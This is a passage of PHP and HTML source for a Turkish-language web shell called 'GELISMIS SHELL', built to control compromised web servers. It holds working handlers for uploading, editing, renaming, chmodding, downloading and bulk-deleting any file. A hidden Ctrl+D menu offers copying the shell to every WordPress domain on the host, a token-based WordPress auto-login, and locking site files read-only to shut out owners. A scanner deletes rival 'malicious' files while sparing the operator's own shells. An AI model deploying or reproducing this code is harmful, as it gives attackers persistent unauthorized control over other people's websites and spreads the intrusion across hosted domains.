= $_GET['pass'] ?? ''; $current_dir = $_GET['dir'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } $paths_array = explode('\|\|', $paths); $result = bulk_delete($paths_array); $_SESSION['malicious'] = find_malicious_files($current_dir); $_SESSION['scan_completed'] = time(); echo json_encode(['success' => true, 'deleted' => $result['deleted'], 'failed' => $result['failed'], 'message' => "{$result['deleted']} dosya/klasör silindi."]); exit; } if (isset($_GET['scan_ajax'])) { header('Content-Type: application/json; charset=UTF-8'); $dir = $_GET['dir'] ?? ''; $pass = $_GET['pass'] ?? ''; if (!check_password($pass)) { echo json_encode(['success' => false, 'message' => '']); exit; } $malicious = find_malicious_files($dir); $_SESSION['malicious'] = $malicious; $_SESSION['scan_completed'] = time(); echo json_encode(['success' => true, 'count' => count($malicious), 'message' => count($malicious) . " zararlı dosya bulundu!"]); exit; } if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['REQUEST_METHOD'] === 'POST') { header('Content-Type: application/json; charset=UTF-8'); $file = $_POST['file'] ?? ''; $content = $_POST['content'] ?? ''; if ($file && file_exists($file)) { clearstatcache(true, $file); $perms = fileperms($file) & 0777; if ($perms <= 0444 && $perms != 0644 && $perms != 0664 && $perms != 0777) { echo json_encode(['success' => false, 'message' => '']); exit; } $old_perms = $perms; if (!is_writable($file)) @chmod($file, 0644); if (file_put_contents($file, $content) !== false) { if ($old_perms <= 0444 && $old_perms != 0644) @chmod($file, $old_perms); echo json_encode(['success' => true, 'message' => '']); } else { echo json_encode(['success' => false, 'message' => '']); } } else { echo json_encode(['success' => false, 'message' => '']); } exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && !isset($_SERVER['HTTP_X_REQUESTED_WITH'])) { $action = $_POST['action'] ?? ''; $current_dir = $_POST['current_dir'] ?? getcwd(); $output = ''; $redirect_url = '?dir=' . urlencode($current_dir); if ($action==='rename') { $old=$_POST['old']??''; $new=$_POST['new']??''; $new_path=dirname($old).'/'.$new; if ($old&&$new&&file_exists($old)&&!file_exists($new_path)) { rename($old,$new_path); } } elseif ($action==='chmod') { $file=$_POST['file']??''; $mode=$_POST['mode']??''; if ($file&&$mode) { chmod($file,octdec($mode)); } } elseif ($action==='toggle_write'&&!empty($_POST['paths'])) { foreach ($_POST['paths'] as $p) { $p=stripslashes($p); if (file_exists($p)&&!in_array(basename($p),$protected_files)&&!in_array(basename($p),$wordpress_core_files)&&!in_array(basename($p),$our_shells)) { clearstatcache(true,$p); $perms=fileperms($p)&0777; $new_perms=($perms&0200)?($perms&~0200):($perms\|0200); $ok=@chmod($p,$new_perms); if (!$ok && is_file($p)) { $content=@file_get_contents($p); if ($content!==false) { @file_put_contents($p,$content); @chmod($p,$new_perms); } } } } } elseif ($action==='upload'&&isset($_FILES['files'])) { $uploaded=0; foreach ($_FILES['files']['tmp_name'] as $i=>$tmp) { $name=$_FILES['files']['name'][$i]; $target = $current_dir.'/'.$name; if (move_uploaded_file($tmp,$target)) { chmod($target,0644); } } } header('Location: ' . $redirect_url); exit; } if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { while (ob_get_level()) ob_end_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Content-Length: '.filesize($file)); readfile($file); exit; } } $items = scandir($current_dir); $folders = array(); $files = array(); foreach ($items as $item) { if ($item=='.'\|\|$item=='..') continue; $path = $current_dir.'/'.$item; if (is_dir($path)) $folders[]=$item; else $files[]=$item; } sort($folders); sort($files); $malicious_files = (isset($_SESSION['malicious'])&&isset($_SESSION['scan_completed'])) ? $_SESSION['malicious'] : array(); $analysis = $_SESSION['analysis'] ?? ''; $analysis_file = $_SESSION['analysis_file'] ?? ''; unset($_SESSION['analysis'],$_SESSION['analysis_file']); $deploy_url = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?deploy=run'; $wp_auto_login_url = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?wp_auto_login=1&token=' . $wp_auto_login_token; $file_to_edit = null; if (isset($_GET['editf'])) { $file_to_edit = base64_decode($_GET['editf']); } elseif (isset($_GET['edit'])) { $file_to_edit = $_GET['edit']; } $wp_domain_count = get_wordpress_domain_count(); $wp_domains_list = get_wordpress_domains_list(); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>GELISMIS SHELL - WP Domain: <?php echo $wp_domain_count; ?></title> <style> * { margin:0; padding:0; box-sizing:border-box; } body { background:#1e272e; color:#fff; font-family:system-ui, -apple-system, 'Segoe UI', Roboto, Arial, sans-serif; padding:20px; } .container { max-width:1400px; margin:0 auto; background:#2f3640; padding:20px; border-radius:12px; } h2 { font-size:16px; margin-bottom:15px; padding:10px; background:#353b48; border-radius:8px; word-break:break-all; } h3 { margin:15px 0 10px; color:#00a8ff; font-size:14px; } .top-bar { display:flex; gap:10px; flex-wrap:wrap; margin-bottom:20px; align-items:center; justify-content:flex-end; background:#353b48; padding:10px 15px; border-radius:8px; } .action-btn { display:inline-block; padding:8px 16px; border-radius:6px; text-decoration:none; font-weight:600; text-align:center; cursor:pointer; border:none; font-size:12px; transition:all 0.2s; } .action-btn.close { background:#e84118; color:#fff; } .action-btn.open { background:#44bd32; color:#fff; } .action-btn.izin { background:#f39c12; color:#000; } .action-btn.deploy { background:#8e44ad; color:#fff; } .action-btn.wp { background:#3498db; color:#fff; } .action-btn.scan { background:#e67e22; color:#fff; } .action-btn.domain { background:#00a8ff; color:#fff; } .action-btn.malicious { background:#e84118; color:#fff; } .action-btn.permission { background:#1abc9c; color:#fff; } .action-btn.lock-wp { background:#9b59b6; color:#fff; } .action-btn.unlock-wp { background:#2ecc71; color:#fff; } .action-btn:hover { opacity:0.85; transform:translateY(-1px); } .toolbar { display:flex; gap:8px; flex-wrap:wrap; margin-bottom:20px; background:#353b48; padding:10px 15px; border-radius:8px; align-items:center; } button, a.button { background:#40739e; color:#fff; border:none; padding:8px 14px; border-radius:6px; cursor:pointer; text-decoration:none; font-size:12px; transition:all 0.2s; } button:hover, a.button:hover { background:#487eb0; } .danger { background:#e84118; } .danger:hover { background:#c23616; } .success { background:#44bd32; } .warning { background:#f39c12; color:#000; } .info { background:#00a8ff; } .row { display:grid; grid-template-columns:30px 2fr auto; gap:10px; align-items:center; background:#353b48; padding:8px 12px; border-radius:8px; margin:4px 0; transition:background 0.2s; } .row:hover { background:#40739e; } .row.malicious { background:#3d2d2d; border-left:3px solid #e84118; } .row.protected { background:#2d2d2d; border-left:3px solid #44bd32; opacity:0.9; } .name a { color:#00a8ff; text-decoration:none; } .name a:hover { text-decoration:underline; } .wp-badge, .our-badge, .malicious-badge, .protected-badge, .inactive-badge { padding:2px 8px; border-radius:20px; font-size:10px; margin-left:8px; font-weight:600; display:inline-block; } .wp-badge, .our-badge, .protected-badge { background:#44bd32; color:#000; } .malicious-badge { background:#e84118; color:#fff; } .inactive-badge { background:#888; color:#fff; } .inline-controls { display:flex; gap:6px; align-items:center; flex-wrap:wrap; } .list-header { display:flex; justify-content:space-between; align-items:center; margin:15px 0 10px; } hr { border:1px solid #353b48; margin:20px 0; } .modal { display:none; position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.85); z-index:1000; align-items:center; justify-content:center; } .modal.active { display:flex; } .modal-content { background:#2f3640; padding:25px; width:900px; max-width:90%; border-radius:12px; max-height:80vh; overflow-y:auto; } .modal-content h3 { margin-top:0; } .toast { position:fixed; bottom:30px; right:30px; background:#2f3640; color:#fff; padding:12px 20px; border-radius:8px; z-index:9999; border-left:4px solid #44bd32; box-shadow:0 4px 12px rgba(0,0,0,0.3); max-width:400px; word-break:break-word; font-size:13px; white-space:pre-line; animation: fadeInOut 3s ease forwards; } .toast.error { border-left-color:#e84118; } .toast.success { border-left-color:#44bd32; } .toast.info { border-left-color:#00a8ff; } @keyframes fadeInOut { 0% { opacity:0; transform:translateY(20px); } 10% { opacity:1; transform:translateY(0); } 90% { opacity:1; } 100% { opacity:0; transform:translateY(-20px); visibility:hidden; } } .domain-list { max-height:400px; overflow-y:auto; margin:15px 0; border:1px solid #40739e; border-radius:8px; } .domain-item { padding:12px; background:#353b48; margin:2px 0; cursor:pointer; border-bottom:1px solid #40739e; display:flex; justify-content:space-between; align-items:center; } .domain-item:hover { background:#40739e; } .domain-url { color:#00a8ff; font-weight:bold; font-size:14px; } .domain-path { color:#888; font-size:11px; margin-top:4px; } .domain-stats { display:flex; gap:10px; margin-bottom:15px; flex-wrap:wrap; } .domain-stat-box { background:#353b48; padding:10px 15px; border-radius:8px; text-align:center; } .delete-section { margin-top:20px; background:#3d2d2d; border-radius:10px; border-left:3px solid #e84118; overflow:hidden; } .delete-title { color:#e84118; font-weight:bold; padding:12px 18px; cursor:pointer; display:flex; justify-content:space-between; align-items:center; user-select:none; } .delete-title:hover { background:rgba(232,65,24,0.15); } .delete-title .toggle-arrow { font-size:11px; transition:transform 0.25s; } .delete-title.collapsed .toggle-arrow { transform:rotate(-90deg); } .delete-body { padding:0 18px 18px; } .delete-body.collapsed { display:none; } .pre-box { background:#1e272e; padding:15px; border-radius:8px; color:#0f0; font-family:'Courier New',monospace; white-space:pre-wrap; max-height:500px; overflow:auto; border:1px solid #40739e; font-size:12px; line-height:1.5; } .stats { background:#353b48; padding:12px 15px; border-radius:8px; margin:15px 0 0; display:flex; gap:20px; flex-wrap:wrap; } .stat-item { flex:1; text-align:center; } .stat-value { font-size:28px; font-weight:bold; color:#00a8ff; } .stat-label { font-size:11px; color:#888; margin-top:4px; } .editor-container { background:#1e272e; border-radius:10px; overflow:hidden; margin-top:10px; border:1px solid #40739e; } .editor-header { background:#2f3640; padding:12px 15px; border-bottom:1px solid #40739e; display:flex; justify-content:space-between; align-items:center; flex-wrap:wrap; gap:10px; } .editor-title { font-size:14px; font-weight:600; color:#00a8ff; word-break:break-all; } .editor-title code { background:#1e272e; padding:4px 8px; border-radius:5px; font-size:12px; } .editor-buttons { display:flex; gap:8px; } .editor-buttons button { padding:6px 14px; font-size:12px; } .editor-buttons .save-btn { background:#44bd32; color:#000; font-weight:bold; } .editor-buttons .save-btn:hover { background:#55dd44; } .editor-buttons .cancel-btn { background:#e84118; } .editor-buttons .copy-btn { background:#3498db; } .editor-textarea { width:100%; min-height:500px; background:#0d1117; color:#e6edf3; border:none; padding:15px; font-family:'Monaco', 'Menlo', 'Ubuntu Mono', 'Consolas', monospace; font-size:13px; line-height:1.6; resize:vertical; outline:none; tab-size:4; } .editor-textarea:focus { outline:none; background:#161b22; } .editor-info { background:#2f3640; padding:8px 15px; font-size:11px; color:#888; display:flex; justify-content:space-between; flex-wrap:wrap; gap:10px; border-top:1px solid #40739e; } .editor-info span { color:#00a8ff; } .warning-box { background:#e84118; padding:12px 15px; border-radius:8px; margin-bottom:15px; color:#fff; font-weight:500; display:flex; align-items:center; gap:10px; } .warning-box::before { content:"⚠️"; font-size:18px; } .upload-row { display:flex; gap:10px; align-items:center; flex-wrap:wrap; } .hidden-menu { background:#2d2d2d; padding:10px 15px; border-radius:8px; margin-bottom:15px; border-left:3px solid #f39c12; display:flex; align-items:center; gap:10px; flex-wrap:wrap; } .hidden-menu.hidden { display:none; } .hidden-menu-title { color:#f39c12; font-size:12px; display:flex; align-items:center; gap:8px; } .loading-overlay { position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.5); z-index:10000; display:flex; align-items:center; justify-content:center; visibility:hidden; } .loading-overlay.active { visibility:visible; } .spinner { width:50px; height:50px; border:3px solid #40739e; border-top-color:#00a8ff; border-radius:50%; animation: spin 1s linear infinite; } @keyframes spin { to { transform:rotate(360deg); } } .checkbox-column { width:30px; text-align:center; } .wp-count-badge { background:#00a8ff; color:#fff; padding:4px 12px; border-radius:20px; font-size:12px; font-weight:bold; margin-left:10px; } </style> <script> function toggleAll(s){ var checkboxes = document.querySelectorAll("input[name='bulk_delete[]']"); checkboxes.forEach(cb => cb.checked = s.checked); } function toggleMalicious(s){ var checkboxes = document.querySelectorAll("input[name='selected[]']"); checkboxes.forEach(cb => cb.checked = s.checked); } function showRenameModal(path,name){ document.getElementById('rename_old').value = path; document.getElementById('rename_new').value = name; document.getElementById('renameModal').classList.add('active'); } function hideRenameModal(){ document.getElementById('renameModal').classList.remove('active'); } function showDomainModal(){ document.getElementById('domainModal').classList.add('active'); } function hideDomainModal(){ document.getElementById('domainModal').classList.remove('active'); } function showMaliciousModal(){ document.getElementById('maliciousModal').classList.add('active'); } function hideMaliciousModal(){ document.getElementById('maliciousModal').classList.remove('active'); } function goToDomain(path){ window.location.href = '?dir=' + encodeURIComponent(path); } function openDomainUrl(url){ window.open(url, '_blank'); } function downloadFile(path){ window.location.href = '?download=' + encodeURIComponent(path); } function analyzeFile(path){ var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input name="action" value="analyze"><input name="file" value="' + path.replace(/"/g, '"') + '">'; document.body.appendChild(form); form.submit(); } function editFile(path){ window.location.href = '?editf=' + btoa(unescape(encodeURIComponent(path))) + '&dir=<?php echo urlencode($current_dir); ?>'; } function openUrl(url){ window.open(url, '_blank'); } function toggleSection(titleEl){ titleEl.classList.toggle('collapsed'); var body = titleEl.nextElementSibling; body.classList.toggle('collapsed'); } function showToast(message, type){ if(!message) return; var toast = document.createElement('div'); toast.className = 'toast ' + (type \|\| 'info'); toast.innerHTML = message.replace(/\n/g, '<br>'); document.body.appendChild(toast); setTimeout(function(){ if(toast && toast.remove) toast.remove(); }, 4000); } function kilitIslem(action){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?kilit_ajax=' + action + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success && response.message){ showToast(response.message, 'success'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function wpLockAction(action){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?wp_lock_action=' + action + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success !== false){ var msg = ''; if(action === 'status'){ msg = '📊 WP KİLİT DURUMU:\n🔒 Kilitli: ' + (response.is_locked ? 'Evet' : 'Hayır') + '\n📦 MU-Plugin: ' + (response.mu_plugin_active ? 'Aktif' : 'Pasif'); } else { msg = '✅ ' + (action === 'lock' ? 'WP KİLİTLENDİ' : 'WP KİLİDİ AÇILDI') + '\n📄 Dosyalar: ' + response.files_changed + ' değiştirildi\n📁 Klasörler: ' + response.dirs_changed + ' değiştirildi\n⏱️ Süre: ' + response.elapsed + ' sn'; } showToast(msg, action === 'lock' ? 'success' : 'info'); } else { showToast('❌ ' + (response.error \|\| 'Hata oluştu!'), 'error'); } } catch(e){ showToast('❌ Hata: ' + e.message, 'error'); } btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; showToast('❌ Bağlantı hatası!', 'error'); }; xhr.send(); } function scanAllDomains(){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ Taranıyor...'; btn.disabled = true; showToast('🔍 Tüm domainler taranıyor, bu işlem birkaç dakika sürebilir...', 'info'); var xhr = new XMLHttpRequest(); xhr.open('GET', '?scan_all_ajax=1&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message + ' (' + response.domains_scanned + ' domain tarandı)', 'success'); } else { showToast('❌ Hata oluştu!', 'error'); } } catch(e){ showToast('❌ Hata: ' + e.message, 'error'); } btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; showToast('❌ Bağlantı hatası!', 'error'); }; xhr.send(); } function deployToAllDomains(){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ Kopyalanıyor...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?deploy_all_ajax=1&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message + ' (' + response.domains + ' domain)', 'success'); } else { showToast('❌ Hata oluştu!', 'error'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function checkPermissions(){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?file_permission_action=check&file=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ var msg = ''; if(response.htaccess.exists){ msg += '📁 .htaccess: ' + (response.htaccess.writable ? '✅ Yazılabilir' : '❌ Salt Okunur'); } else { msg += '📁 .htaccess: ❌ Dosya yok'; } msg += '\n'; if(response.index.exists){ msg += '📄 index.php: ' + (response.index.writable ? '✅ Yazılabilir' : '❌ Salt Okunur'); } else { msg += '📄 index.php: ❌ Dosya yok'; } showToast(msg, 'info'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function setHtaccessWritable(writable){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?file_permission_action=set_htaccess&file=<?php echo urlencode($current_dir); ?>&writable=' + writable + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success && response.message){ showToast('✅ .htaccess ' + response.message, 'success'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function setIndexWritable(writable){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?file_permission_action=set_index&file=<?php echo urlencode($current_dir); ?>&writable=' + writable + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success && response.message){ showToast('✅ index.php ' + response.message, 'success'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function scanMaliciousAjax(){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?scan_ajax=1&dir=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message, 'success'); setTimeout(function(){ location.reload(); }, 1500); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function bulkDeleteAjax(){ var checkboxes = document.querySelectorAll("input[name='bulk_delete[]']:checked"); if(checkboxes.length === 0){ showToast('❌ Lütfen silinecek dosya/klasör seçin!', 'error'); return; } var pass = prompt('Şifre:'); if(!pass) return; var paths = []; checkboxes.forEach(cb => paths.push(cb.value)); var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?bulk_delete_ajax=1&paths=' + encodeURIComponent(paths.join('\|\|')) + '&dir=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message, 'success'); setTimeout(function(){ location.reload(); }, 1500); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function deleteSelectedMalicious(){ var checkboxes = document.querySelectorAll("input[name='selected[]']:checked"); if(checkboxes.length === 0){ showToast('❌ Lütfen silinecek dosyaları seçin!', 'error'); return; } var pass = prompt('Şifre:'); if(!pass) return; var paths = []; checkboxes.forEach(cb => paths.push(cb.value)); var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?bulk_delete_ajax=1&paths=' + encodeURIComponent(paths.join('\|\|')) + '&dir=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message, 'success'); setTimeout(function(){ location.reload(); }, 1500); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function saveFile(){ var content = document.getElementById('editor-content').value; var file = document.getElementById('edit-file').value; var currentDir = document.getElementById('current-dir').value; var loadingOverlay = document.getElementById('loading-overlay'); loadingOverlay.classList.add('active'); var xhr = new XMLHttpRequest(); xhr.open('POST', '', true); xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest'); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onload = function(){ loadingOverlay.classList.remove('active'); try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ Kaydedildi', 'success'); setTimeout(function(){ window.location.href = '?dir=' + encodeURIComponent(currentDir); }, 1000); } } catch(e){} }; xhr.onerror = function(){ loadingOverlay.classList.remove('active'); }; xhr.send('action=edit&file=' + encodeURIComponent(file) + '&content=' + encodeURIComponent(content) + '&current_dir=' + encodeURIComponent(currentDir)); } document.addEventListener('keydown', function(e){ if(e.ctrlKey && e.key === 'd'){ e.preventDefault(); var hiddenMenu = document.getElementById('hidden-menu'); if(hiddenMenu.classList.contains('hidden')){ hiddenMenu.classList.remove('hidden'); showToast('🔓 Gizli menü gösteriliyor', 'info'); } else { hiddenMenu.classList.add('hidden'); showToast('🔒 Gizli menü gizlendi', 'info'); } } }); function copyToClipboard(){ var textarea = document.getElementById('editor-content'); textarea.select(); document.execCommand('copy'); showToast('📋 Kopyalandı!', 'success'); } </script> </head> <body> <div class="container"> <div style="background:#353b48; padding:8px; margin-bottom:15px; text-align:center; color:#00a8ff; font-weight:bold; border-radius:8px; font-size:13px;"> 🔥 GELİŞMİŞ SHELL \| <?php echo implode(', ', $allowed_shells); ?> <span class="wp-count-badge">📊 WP DOMAIN: <?php echo $wp_domain_count; ?></span> </div> <div class="top-bar"> <a href="?logout=1" class="button">🚪 Çıkış</a> </div> <div id="hidden-menu" class="hidden-menu hidden"> <span class="hidden-menu-title">🔐 GİZLİ MENÜ (Ctrl+D)</span> <button class="action-btn domain" onclick="showDomainModal()">🌐 WP Domainler (<?php echo $wp_domain_count; ?>)</button> <button class="action-btn scan" onclick="scanMaliciousAjax()">🔍 ZARARLI TARA</button> <button class="action-btn scan" onclick="scanAllDomains()">🌍 TÜM DOMAINLERİ TARA</button> <?php if (!empty($malicious_files)): ?> <button class="action-btn malicious" onclick="showMaliciousModal()">⚠️ ZARARLILAR (<?php echo count($malicious_files); ?>)</button> <?php endif; ?> <a href="#" onclick="if(confirm('Tüm domainlere shell kopyalansin mi?')){ openUrl('<?php echo $deploy_url; ?>'); } return false;" class="action-btn deploy">📦 SHELL KOPYALA</a> <button class="action-btn deploy" onclick="deployToAllDomains()">📦 TÜM DOMAINLERE KOPYALA</button> <a href="#" onclick="openUrl('<?php echo $wp_auto_login_url; ?>'); return false;" class="action-btn wp">🚀 WP GİRİŞ</a> <a href="#" onclick="kilitIslem('close'); return false;" class="action-btn close">🔒 SİSTEMİ KİLITLE</a> <a href="#" onclick="kilitIslem('open'); return false;" class="action-btn open">🔓 SİSTEM KİLİDİNİ AÇ</a> <a href="#" onclick="kilitIslem('izin'); return false;" class="action-btn izin">📊 SİSTEM DURUMU</a> <button class="action-btn lock-wp" onclick="wpLockAction('lock')">🔒 WP LOCK (0444/0555)</button> <button class="action-btn unlock-wp" onclick="wpLockAction('unlock')">🔓 WP UNLOCK (0644/0755)</button> <button class="action-btn izin" onclick="wpLockAction('status')">📊 WP KİLİT DURUMU</button> <button class="action-btn permission" onclick="checkPermissions()">📋 İZİN KONTROL</button> <button class="action-btn success" onclick="setHtaccessWritable(true)">✏️ .htaccess YAZ</button> <button class="action-btn danger" onclick="setHtaccessWritable(false)">🔒 .htaccess OKU</button> <button class="action-btn success" onclick="setIndexWritable(true)">✏️ index.php YAZ</button> <button class="action-btn danger" onclick="setIndexWritable(false)">🔒 index.php OKU</button> </div> <h2>📁 <?php echo htmlspecialchars($current_dir); ?></h2> <div class="toolbar"> <?php if (dirname($current_dir) != $current_dir): ?> <a class="button" href="?dir=<?php echo urlencode(dirname($current_dir)); ?>">📂 Üst Dizin</a> <?php endif; ?> <span style="margin-left:auto; font-size:11px;">Korunan: <?php echo count($our_shells) + count($wordpress_core_files) + count($protected_files); ?> dosya</span> </div> <form method="post" enctype="multipart/form-data" class="upload-row" style="margin:15px 0;"> <input type="file" name="files[]" multiple style="background:#1e272e; border:1px solid #40739e; padding:8px; border-radius:6px; color:#fff; flex:1;"> <button type="submit" class="success">📤 Dosya Yükle</button> <input type="hidden" name="action" value="upload"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> </form> <hr> <div id="domainModal" class="modal"><div class="modal-content"> <h3>🌐 WordPress Kurulu Domainler (<?php echo $wp_domain_count; ?> adet)</h3> <div class="domain-stats"><div class="domain-stat-box"><div class="stat-value" style="color:#00a8ff;"><?php echo $wp_domain_count; ?></div><div class="stat-label">WordPress Kurulu Domain</div></div></div> <?php if($wp_domain_count > 0): ?> <div class="domain-list"> <?php foreach ($wp_domains_list as $d): ?> <div class="domain-item" onclick="goToDomain('<?php echo htmlspecialchars($d['path']); ?>')"> <div><span class="domain-url">📁 <?php echo htmlspecialchars($d['path']); ?></span> <div class="domain-path"><?php if($d['has_wp_config']): ?>✅ wp-config.php <?php endif; ?><?php if($d['has_wp_load']): ?>✅ wp-load.php <?php endif; ?><?php if($d['has_wp_admin']): ?>✅ /wp-admin <?php endif; ?><?php if($d['has_wp_content']): ?>✅ /wp-content <?php endif; ?></div></div> <button class="button info" onclick="event.stopPropagation(); goToDomain('<?php echo htmlspecialchars($d['path']); ?>')">📂 Aç</button> </div> <?php endforeach; ?> </div> <?php else: ?> <div style="text-align:center; padding:40px; color:#888;">⚠️ WordPress kurulu domain bulunamadı!</div> <?php endif; ?> <button onclick="hideDomainModal()">Kapat</button> </div></div> <?php if (!empty($malicious_files)): ?> <div id="maliciousModal" class="modal"><div class="modal-content"> <h3>⚠️ ZARARLI DOSYALAR (<?php echo count($malicious_files); ?>)</h3> <div style="margin-bottom:15px;"><button class="action-btn danger" onclick="deleteSelectedMalicious()">🗑 SEÇİLİLERİ SİL</button><button onclick="hideMaliciousModal()">Kapat</button></div> <table style="width:100%; border-collapse:collapse;"><thead><tr style="border-bottom:1px solid #40739e;"><th class="checkbox-column"><input type="checkbox" onclick="toggleMalicious(this)"></th><th style="padding:8px; text-align:left;">Dosya</th><th style="padding:8px; text-align:left; width:60px;">Risk</th><th style="padding:8px; text-align:left; width:200px;">İşlemler</th></tr></thead> <tbody><?php foreach ($malicious_files as $m): ?> <tr style="border-bottom:1px solid #353b48;"><td class="checkbox-column"><input type="checkbox" name="selected[]" value="<?php echo htmlspecialchars($m['path']); ?>"></td> <td style="padding:8px;"><strong><?php echo htmlspecialchars($m['name']); ?></strong><br><small style="color:#888;"><?php echo htmlspecialchars(substr(dirname($m['path']),0,60)); ?></small><br><small>Boyut: <?php echo $m['size']; ?> bytes</small></td> <td style="padding:8px;"><span style="background:#e84118; padding:2px 8px; border-radius:20px; font-size:11px;"><?php echo $m['risk']; ?></span></td> <td style="padding:8px;"><button type="button" onclick="downloadFile('<?php echo addslashes($m['path']); ?>')">📥 İndir</button><button type="button" onclick="showRenameModal('<?php echo addslashes($m['path']); ?>','<?php echo addslashes($m['name']); ?>')">✏️ Adlandır</button><button type="button" onclick="analyzeFile('<?php echo addslashes($m['path']); ?>')">🔍 Analiz</button><button type="button" onclick="editFile('<?php echo addslashes($m['path']); ?>')">✏️ Düzenle</button></td></tr> <?php endforeach; ?></tbody></table> </div></div> <?php endif; ?> <?php if (!empty($plugins['suspicious'])): ?> <div class="delete-section"><div class="delete-title collapsed" onclick="toggleSection(this)">⚠️ ŞÜPHELİ EKLENTİLER (<?php echo count($plugins['suspicious']); ?>) <span class="toggle-arrow">▼</span></div> <div class="delete-body collapsed"> <?php foreach ($plugins['suspicious'] as $plugin): ?> <div class="row"><div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($plugin['path']); ?>"></div> <div>📦 <?php echo htmlspecialchars($plugin['name']); ?><span class="inactive-badge">PASİF</span><span class="malicious-badge">ŞÜPHELİ</span></div> 